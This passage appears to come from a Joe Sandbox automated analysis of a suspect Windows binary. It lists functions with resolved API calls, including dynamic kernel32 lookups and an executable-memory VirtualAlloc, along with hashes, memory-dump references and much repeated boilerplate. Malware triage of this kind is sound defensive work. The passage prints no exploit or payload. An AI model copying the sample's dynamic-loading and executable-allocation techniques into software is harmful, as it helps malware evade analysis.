                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                                                  • API String ID: 1029625771-2819208100
                                                                                                                                                                  • Opcode ID: acdad705b4df7f09385c973e9e9e4967123fe07eb2454f43db9ce1b69fa67268
                                                                                                                                                                  • Instruction ID: 1501999edb3f5705c05585555f68b81a3cfe1382679762948886ec7718c07f6b
                                                                                                                                                                  • Opcode Fuzzy Hash: acdad705b4df7f09385c973e9e9e4967123fe07eb2454f43db9ce1b69fa67268
                                                                                                                                                                  • Instruction Fuzzy Hash: 3AE0B6B4B59305ABDB209F62FD4DB553A69B706702F100054F10ED10B0CFB64960DB54
                                                                                                                                                                  Function 0025BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                                                                  • Opcode ID: 5b76139213a91fc107660b40fd50b07b288030d94cf5eddc5bfce21c48ba746c
                                                                                                                                                                  • Instruction ID: 5dd9ccc1f1682e3f75529bb49d0da5fcc0d28960189348678817a572a782782d
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b76139213a91fc107660b40fd50b07b288030d94cf5eddc5bfce21c48ba746c
                                                                                                                                                                  • Instruction Fuzzy Hash: FAE0EC71C3811CEBCB1597909C169BA73BCBB04302F108492BD1691041D7759B68AB15
                                                                                                                                                                  Function 002420F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,002420EC,?,002422E0), ref: 00242104
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,GetProcessId), ref: 00242116
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                                                                                                  • API String ID: 1029625771-399901964
                                                                                                                                                                  • Opcode ID: 11e7a2744e762f7fe69d9072f860d1e052b9c3dc42ff66bc03f302e1fc0a372b
                                                                                                                                                                  • Instruction ID: 4e3db93711654491eacd0451581d8d5a596a0977ef309faa4a2515e1cd1d14ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 11e7a2744e762f7fe69d9072f860d1e052b9c3dc42ff66bc03f302e1fc0a372b
                                                                                                                                                                  • Instruction Fuzzy Hash: 95D0A734920323DFDB216F62F80D61236D4AB09300B008459F69DD1155D7F0C494CA10
                                                                                                                                                                  Function 001FE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,001FE69C,74DF0AE0,001FE5AC,0027DC28,?,?), ref: 001FE6B4
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 001FE6C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                  • API String ID: 1029625771-192647395
                                                                                                                                                                  • Opcode ID: b358ecbbf878cc7581710a6de7a6eddb10590eaaa7519ed5116b463aabb5bc47
                                                                                                                                                                  • Instruction ID: d89f822174db2b14f38213d731fcfec04bd5c113a2500b5047681b932587db47
                                                                                                                                                                  • Opcode Fuzzy Hash: b358ecbbf878cc7581710a6de7a6eddb10590eaaa7519ed5116b463aabb5bc47
                                                                                                                                                                  • Instruction Fuzzy Hash: A9D0A734D1071EDFDB205F35F84C61237D8AB25312F009469E599D1170D7F0D4908650
                                                                                                                                                                  Function 001FE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,001FE6D9,?,001FE55B,0027DC28,?,?), ref: 001FE6F1
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,IsWow64Process,?,?), ref: 001FE703
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                  • API String ID: 1029625771-3024904723
                                                                                                                                                                  • Opcode ID: 3e5914ef74ed588ad9e0b42e50fc038f0f720a3a2c8696accab3aceb19eaae06
                                                                                                                                                                  • Instruction ID: 9c19581de75b6b8390df65710b1cc0bdb392838d1b25834bc374ac41d798e936
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e5914ef74ed588ad9e0b42e50fc038f0f720a3a2c8696accab3aceb19eaae06
                                                                                                                                                                  • Instruction Fuzzy Hash: E3D0A738910316DFDB207F21F88C6133FD4BF06300B008559E6DDD2160D7F0D4808650
                                                                                                                                                                  Function 0023EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0023EBAF,?,0023EAAC), ref: 0023EBC7
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0023EBAF,?,0023EAAC), ref: 0023EBD9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                  • API String ID: 1029625771-1816364905
                                                                                                                                                                  • Opcode ID: f325f045d8f448c4dcf554ba644c7ead1892aaedd214c303d22c1ea3a7bda731
                                                                                                                                                                  • Instruction ID: 4bdc917d61f81fe19d1510d1c5f3c15748629b1c74b304b43a0acd444684cebc
                                                                                                                                                                  • Opcode Fuzzy Hash: f325f045d8f448c4dcf554ba644c7ead1892aaedd214c303d22c1ea3a7bda731
                                                                                                                                                                  • Instruction Fuzzy Hash: ECD0A7749243139FDF306F31F84CA01B6D4BB05708F11C469F4DAD1190DBF0D8948650
                                                                                                                                                                  Function 0022137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,0022135F,?,00221440), ref: 00221389
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,RegisterTypeLibForUser,?,00221440), ref: 0022139B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                  • API String ID: 1029625771-1071820185
                                                                                                                                                                  • Opcode ID: f7020807581b13c7e24e2cb65b5db7fe08812afa1baa15493079ba78a8e7388e
                                                                                                                                                                  • Instruction ID: c0f03c5737f6d5f47a77c2c3e91c4c776b1f82e4e8ef4d82fcf01deca904bfbb
                                                                                                                                                                  • Opcode Fuzzy Hash: f7020807581b13c7e24e2cb65b5db7fe08812afa1baa15493079ba78a8e7388e
                                                                                                                                                                  • Instruction Fuzzy Hash: 20D0A730D20323AFDB208FA5F80CB4136D4AF15314F048499E899D1590D6F4C8B08710
                                                                                                                                                                  Function 002213A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00221371,?,00221519), ref: 002213B4
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 002213C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                  • API String ID: 1029625771-1587604923
                                                                                                                                                                  • Opcode ID: d619d0187f0c6e1183f4d53630c4d4a3676e882fa2364bf3a7b111f7906e0008
                                                                                                                                                                  • Instruction ID: 00a47b8c88177213d9f32631ebdece58294036e7fbc046f2272fbbaadca557c7
                                                                                                                                                                  • Opcode Fuzzy Hash: d619d0187f0c6e1183f4d53630c4d4a3676e882fa2364bf3a7b111f7906e0008
                                                                                                                                                                  • Instruction Fuzzy Hash: 62D0A730920323AFDB208F65F80CA4136E9AB55304F0084A9E459D1560DAF0C8E48710
                                                                                                                                                                  Function 00243ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00243AC2,?,00243CF7), ref: 00243ADA
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,RegDeleteKeyExW), ref: 00243AEC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                  • API String ID: 1029625771-4033151799
                                                                                                                                                                  • Opcode ID: 2c75b9a59997aaf7f04b1cce6891190f6d6e158540d2aeef6b06204e67eedc4f
                                                                                                                                                                  • Instruction ID: 98b6dbb7cf0aa377eb6a30d340c01298d081fff68804a195ac43a113685e5367
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c75b9a59997aaf7f04b1cce6891190f6d6e158540d2aeef6b06204e67eedc4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 78D0A7719603278FDB309F61F80DA4177D8AB17304B008469E4DAD1150EFF0C4908A14
                                                                                                                                                                  Function 001EAA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00236AA6), ref: 001EAB2D
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 001EAB49
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper_wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 820872866-0
                                                                                                                                                                  • Opcode ID: df8af9109572a46ce8c40b9a4363f797c868a6b8359a6ccbae3e3a1c1339e95c
                                                                                                                                                                  • Instruction ID: 19e6d9113857e7b943ef94e85f43270d8c4b0071a290c35d6121762599aeb213
                                                                                                                                                                  • Opcode Fuzzy Hash: df8af9109572a46ce8c40b9a4363f797c868a6b8359a6ccbae3e3a1c1339e95c
                                                                                                                                                                  • Instruction Fuzzy Hash: AAA1F570B0094ADBDB14DF66E9856BDB7B5FF44300FA5416AEC56C3290EB30A8B1C786
                                                                                                                                                                  Function 00240D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00240D85
                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00240DC8
                                                                                                                                                                    • Part of subcall function 00240458: CharLowerBuffW.USER32(?,?,?,?), ref: 00240478
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00240FB2
                                                                                                                                                                  • _memmove.LIBCMT ref: 00240FC2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3659485706-0
                                                                                                                                                                  • Opcode ID: 92f4743ee6b8302d59ff431c85e597b6edeaa7b22bd61f7fd529fb50388bbc9a
                                                                                                                                                                  • Instruction ID: 0eae24094076e6405174312de5ba450f8759b8916c9693ff541372d078c1d847
                                                                                                                                                                  • Opcode Fuzzy Hash: 92f4743ee6b8302d59ff431c85e597b6edeaa7b22bd61f7fd529fb50388bbc9a
                                                                                                                                                                  • Instruction Fuzzy Hash: E0B18C716143018FC718DF28C48096ABBE4EF99714F14886EF9899B362DB71ED96CF81
                                                                                                                                                                  Function 0023AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0023AF56
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0023AF61
                                                                                                                                                                    • Part of subcall function 00221050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 002210B8
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0023AF6C
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0023B23F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 780911581-0
                                                                                                                                                                  • Opcode ID: fb699dd9425aeeff520c5bc02cff19ad4d853987d77b09bdd93f59d15afaaa28
                                                                                                                                                                  • Instruction ID: 4c8935c9bd8215c9317e6abbf139b6fe779118fd4d0412f5dd8fb441558a36df
                                                                                                                                                                  • Opcode Fuzzy Hash: fb699dd9425aeeff520c5bc02cff19ad4d853987d77b09bdd93f59d15afaaa28
                                                                                                                                                                  • Instruction Fuzzy Hash: 4EA146756147029FCB11DF15C891B2AB7E4FF98320F048459FA9AAB3A1DB70ED54CB82
                                                                                                                                                                  Function 002042EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3877424927-0
                                                                                                                                                                  • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                                                  • Instruction ID: 1553574e24bd83dcafb298dcde142fedfba9af165a6404351f2a91acbf1e28e5
                                                                                                                                                                  • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
